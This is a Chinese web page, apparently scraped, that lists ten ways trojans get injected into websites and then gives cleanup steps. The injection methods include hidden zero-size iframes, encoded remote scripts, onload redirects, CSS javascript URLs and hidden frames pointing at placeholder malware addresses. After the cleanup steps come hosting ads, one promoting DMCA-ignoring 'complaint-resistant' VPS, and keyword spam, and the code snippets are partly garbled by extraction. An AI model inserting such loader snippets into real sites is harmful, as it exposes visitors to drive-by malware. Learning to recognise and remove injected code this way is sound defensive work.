木马网站木马存在形式和清除方法

木马网站  时间:2021-02-20  阅读:()

网站木马存在形式和清除方法h123网址大全http://www.h123.net.cn

木马的存在形态有如下几种

一:框架挂马iframe src=地址width=0 height=0/iframe

二:js文件挂马

首先将以下代码document.write("iframe width='0' height='0' src='地址'/i frame

保存为xxx. js

则JS挂马代码为script language=javascript src=xxx. js/script

三:js变形加密

SCRIPT language="JScript.Encode"src=http://www.xxx.com/muma.txt/scriptmuma. txt可改成任意后缀

四:body挂马body onload="window. location='地址' ;"/body

五:隐蔽挂马top.document.body. innerHTML =top.document.body. innerHTML + ' \r\niframesrc="' ">http://www.xxxxxxxxxxxxxx"/iframe注意此网址

为虚拟仅为说明木马情况。

六:css中挂马body {

background-image:url (' javascript:document.write("scriptsrc=http://www.XXX.net/muma. j s/script") ' ) }

七:JAJA挂马

SCRIPT language=javascriptwindow.open ("地址

", "", "toolbar=no, location=no,directories=no, status=no,menubar=no, scro llbars=no,width=1,height=1") ;

/script

八:图片伪装htmliframe src="网马地址" height=0 width=0/iframeimg src="图片地址"/center

/html

九:伪装调用frameset rows="444,0" cols="*"frame src="打开网页" framborder="no" scrolling="auto"noresize marginwidth="0"margingheight="0"frame src="网马地址" frameborder="no" scrolling="no"noresize marginwidth="0"margingheight="0"

/frameset

十:高级欺骗a href="(迷惑连接地址显示这个地址指向木马地址)"onMouseOver="www_szweb_cn() ; return true;"页面要显示的内容/a

SCRIPT Language="JavaScript"function www_szweb_cn()

{var url="网马地址";open(url, "NewWindow", "toolbar=no, location=no,directories=no,

status=no,menubar=no, scrollbars=no,resizable=no, copyhistory=yes,width=800,height=600, left=10, top=10") ;}

/SCRIPT

清除木马的具体操作步骤如下

1)清除网页中的木马

删除现有的网页中的木马主要有这样类似的代码:iframe„或者„xxx. js/script

出现上面这些特征的代码如果里面包含的网址不是自己网站的那基本上就是中了木马了。我们比较常见的木马是iframe,对网站首页以及其它主要页面的源代码进行检查用记事本打开这些页面后 以“iframe”为关键字进行搜索找到后可以查看是否是挂马代码。不过碰上有经验的黑客会编写一段代码将整句挂马代码进行加密这样我们就很难找到网页中的挂马代码。这时可以将所有网页文件按修改时间进行排序如果有个别网页被修改我们可以很快地发现。

2)刺激google快速更新

木马被清除了 google上还是被屏蔽着。这时就想办法让google爬虫重新检索网站更新检索结果。这样 网站的屏蔽才能被解除。刺激google更新的的手段有如下一些

1)持续更新网站首页的文章

2)重新给google提交网站地图

3)为网站去找一些高质量的外链

4)申请审核。当网站有病毒后在google网站管理员工具内的“诊断”页面会有一个提示就是说网站含有恶意代码然后会提示你可以“申请审核”填写相关信息提交。h123网址大全http://www.h123.net.cn

华纳云不限流量¥324/年,香港双向CN2(GIA)云服务器/1核1G/50G存储/2Mbps

华纳云(HNCloud Limited)是一家专业的全球数据中心基础服务提供商,总部在香港,隶属于香港联合通讯国际有限公司,拥有香港政府颁发的商业登记证明,保证用户的安全性和合规性。 华纳云是APNIC 和 ARIN 会员单位。主要提供香港和美国机房的VPS云服务器和独立服务器。商家支持支付宝、网银、Paypal付款。华纳云主要面向国内用户群,所以线路质量还是不错的,客户使用体验总体反响还是比较好...

PacificRack(年付低至19美元),夏季促销PR-M系列和多IP站群VPS主机

这几天有几个网友询问到是否有Windows VPS主机便宜的VPS主机商。原本他们是在Linode、Vultr主机商挂载DD安装Windows系统的,有的商家支持自定义WIN镜像,但是这些操作起来特别效率低下,每次安装一个Windows系统需要一两个小时,所以如果能找到比较合适的自带Windows系统的服务器那最好不过。这不看到PacificRack商家有提供夏季促销活动,其中包括年付便宜套餐的P...

ParkinHost:俄罗斯离岸主机,抗投诉VPS,200Mbps带宽/莫斯科CN2线路/不限流量/无视DMCA/55折促销26.4欧元 /年起

外贸主机哪家好?抗投诉VPS哪家好?无视DMCA。ParkinHost今年还没有搞过促销,这次parkinhost俄罗斯机房上新服务器,母机采用2个E5-2680v3处理器、128G内存、RAID10硬盘、2Gbps上行线路。具体到VPS全部200Mbps带宽,除了最便宜的套餐限制流量之外,其他的全部是无限流量VPS。ParkinHost,成立于 2013 年,印度主机商,隶属于 DiggDigi...

木马网站为你推荐
雅虎社区福建晋江社区是什么?bluestacksBlueStacks是什么?在PC上畅玩Android 45万款应用二叉树遍历写出二叉树的先序遍历、中序遍历、后序遍历。微信如何建群微信如何建群中小企业信息化信息化为中小企业发展带来了哪些机遇iphone越狱后怎么恢复苹果越狱后如何恢复godaddygodaddy域名怎样使用神雕侠侣礼包大全神雕侠侣手游华山论剑礼包有什么 怎么领取怎么点亮qq空间图标如何点亮QQ空间图标保护气球为什么会那么害怕气球
未注册域名查询 电信服务器租用 香港服务器租用99idc vps动态ip awardspace winhost sub-process 天猫双十一秒杀 debian6 国外php空间 英文站群 台湾谷歌网址 jsp空间 广州服务器 php空间购买 中国网通测速 贵阳电信测速 photobucket 服务器防火墙 网络速度 更多